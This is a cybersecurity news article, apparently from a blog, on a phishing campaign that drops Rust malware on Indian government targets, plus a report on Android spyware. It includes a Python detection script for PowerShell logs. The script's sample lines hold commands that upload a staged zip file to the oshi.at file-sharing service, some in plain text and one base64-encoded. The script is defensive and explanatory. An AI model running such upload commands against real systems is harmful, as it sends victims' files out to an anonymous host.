Rust-Based Malware Targets Websites of Indian Government Organizations in Operation RusticWeb
A phishing campaign has specifically targeted Indian government agencies and the defense industry with the intention of deploying Rust-based malware for the purpose of acquiring intelligence.
The enterprise security firm SEQRITE has given the codename “Operation RusticWeb” to the activity, which was first observed in October 2023.
According to security researcher Sathwik Ram Prakki, “recent techniques involve using Rust-based payloads and encrypted PowerShell commands to transfer sensitive documents to a web-based service engine, rather than a dedicated command-and-control (C2) server.”
Strategic connections have been discovered between the cluster and the groups commonly known as Transparent Tribe and SideCopy, both of which are believed to have ties to Pakistan.
SideCopy is believed to be a sub-group of Transparent Tribe. SEQRITE has previously published a comprehensive report on several coordinated campaigns run by this threat actor against Indian government organizations, distributing a range of trojans including AllaKore RAT, Ares RAT, and DRat.
ThreatMon has recently identified additional attack chains that use decoy Microsoft PowerPoint files and specially crafted RAR archives that exploit CVE-2023-38831 to deploy malware granting unrestricted remote access and control.
“The infection chain of the SideCopy APT Group consists of several meticulously planned steps, designed to guarantee a successful compromise,” stated ThreatMon earlier this year.
The recent series of attacks begins with a phishing email that uses social engineering to lure users into opening malicious PDF files. These files deliver Rust-based payloads that quietly enumerate the file system while displaying a decoy document to the target.
In addition to collecting files of interest, the malware gathers system information and sends it to the C2 server. It does not, however, have the feature set of the more sophisticated stealer malware sold in the criminal underground.
In December, SEQRITE discovered a second infection chain that follows a similar multi-stage procedure. Instead of the Rust malware, this chain uses a PowerShell script to handle the enumeration and exfiltration stages.
In a notable twist, the final payload is still delivered via a Rust executable named “Cisco AnyConnect Web Helper.” The collected data is ultimately uploaded to the oshi[.]at domain, an anonymous public file-sharing service known as OshiUpload.
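The two behaviours the article attributes to the PowerShell variant, recursive enumeration of documents and an HTTP upload to a public file-sharing service such as oshi[.]at, are visible in PowerShell Script Block Logging (Event ID 4104) and process-creation (Event ID 4688) telemetry. The following detection script is an added example written for this page; it is not SEQRITE's code, not the campaign's tooling, and not a reproduction of any real sample. The log lines are constructed and use a simplified `field=value` layout that is an assumption of this example, not a real event format; the indicator lists and the `analyze_line`/`scan_logs` function names are likewise the example's own.

```python
import base64
import re
from typing import List, Optional, Tuple

# Public anonymous file-sharing domain named in the SEQRITE report (OshiUpload).
# Extend with any other services hosts in your environment should never POST to.
FILE_SHARING_DOMAINS = {"oshi.at"}

# Cmdlets and parameters that push a local file body out over HTTP.
UPLOAD_PATTERN = re.compile(
    r"(Invoke-WebRequest|Invoke-RestMethod|iwr|irm)\b.*?(-Method\s+Post|-InFile|-Body)"
    r"|\.UploadFile\(|\.UploadData\(",
    re.IGNORECASE,
)

# Recursive enumeration of document types: the staging step before exfiltration.
ENUM_PATTERN = re.compile(
    r"(Get-ChildItem|gci|ls|dir)\b.*-Recurse.*\.(docx?|xlsx?|pptx?|pdf|txt)",
    re.IGNORECASE,
)

# -EncodedCommand and its short aliases take a base64 blob of UTF-16LE script text.
ENCODED_FLAG = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(text: str) -> Optional[str]:
    """Return the plaintext of an -EncodedCommand argument, or None if absent/invalid."""
    m = ENCODED_FLAG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_script(line: str) -> str:
    """Pull the command text out of a constructed log line (field=value form)."""
    m = re.search(r"(?:ScriptBlockText|CommandLine)=(.*)$", line)
    return m.group(1) if m else line


def analyze_line(line: str) -> List[str]:
    """Return the list of indicators that fire on one log line (empty if benign)."""
    script = extract_script(line)
    reasons: List[str] = []
    decoded = decode_encoded_command(script)
    if decoded is not None:
        reasons.append("encoded PowerShell command")
        script = script + " " + decoded  # inspect the decoded plaintext as well
    for domain in sorted(FILE_SHARING_DOMAINS):
        # Bound the match so "oshi.at" is not found inside an unrelated hostname.
        if re.search(r"(?<![\w.-])" + re.escape(domain) + r"(?![\w-])", script, re.IGNORECASE):
            reasons.append(f"contact with file-sharing service {domain}")
    if UPLOAD_PATTERN.search(script):
        reasons.append("HTTP upload of a local file")
    if ENUM_PATTERN.search(script):
        reasons.append("recursive enumeration of document files")
    return reasons


def scan_logs(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """Return (line index, reasons) for every line that matches at least one indicator."""
    findings = []
    for i, line in enumerate(lines):
        reasons = analyze_line(line)
        if reasons:
            findings.append((i, reasons))
    return findings


def _encode(cmd: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(cmd.encode("utf-16le")).decode("ascii")


# Constructed sample telemetry for this example; not captures from the campaign.
SAMPLE_LOGS = [
    "4104 ScriptBlockText=Get-ChildItem -Path $env:USERPROFILE\\Documents -Recurse -Include *.docx,*.pdf",
    "4104 ScriptBlockText=Get-Process | Sort-Object CPU -Descending | Select-Object -First 5",
    "4104 ScriptBlockText=Invoke-RestMethod -Uri https://oshi.at -Method Post -InFile $env:TEMP\\staged.zip",
    "4688 CommandLine=powershell.exe -NoProfile -EncodedCommand "
    + _encode("Invoke-WebRequest -Uri https://oshi.at -Method Post -InFile C:\\staged.zip"),
    "4104 ScriptBlockText=Invoke-WebRequest -Uri https://update.example.internal/agent.msi -OutFile agent.msi",
]

if __name__ == "__main__":
    for idx, why in scan_logs(SAMPLE_LOGS):
        print(f"line {idx}: {', '.join(why)}")
```

The benign lines (a process listing and a plain download with `-OutFile`) produce no findings, while the enumeration, the clear-text upload and the base64-encoded upload are each flagged with the specific reason. In a real deployment the same three checks would run over 4104 script-block text and 4688 command lines exported from the event log rather than over an inline list, and the domain set would be fed from threat intelligence rather than hard-coded.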
“Operation RusticWeb may be associated with an Advanced Persistent Threat (APT) as it exhibits resemblances to multiple groups connected to Pakistan,” stated Ram Prakki.
The disclosure follows Cyble’s discovery, roughly two months earlier, of a malicious Android application used by the DoNot Team to target individuals in the Kashmir region of India.
The nation-state actor, also tracked as APT-C-35, Origami Elephant, and SECTOR02, is suspected to be of Indian origin and has a track record of using Android malware to compromise smartphones belonging to individuals in Kashmir and Pakistan.
Cyble has analyzed a modified version of the open-source GitHub project “QuranApp: Read and Explore.” This version has been infected with spyware functionalities, including the ability to record audio and VoIP calls, take screenshots, collect data from different applications, download extra APK files, and monitor the location of the targeted individual.
Cyble stated that “the DoNot group’s persistent endeavors to enhance their tools and methods highlight the continuous danger they present, especially when it comes to targeting individuals in the vulnerable Kashmir region of India.”
About The Author:
Yogesh Naager is a content marketer who specializes in the cybersecurity and B2B space. Besides writing for the News4Hackers blog, he has also written for brands including CollegeDunia, Utsav Fashion, and NASSCOM. Naager entered the field of content in an unusual way: he began his career as an insurance sales executive, where he developed an interest in simplifying difficult concepts. He combines this interest with a love of narrative, which makes him an effective writer in the cybersecurity field. He also writes regularly for Craw Security.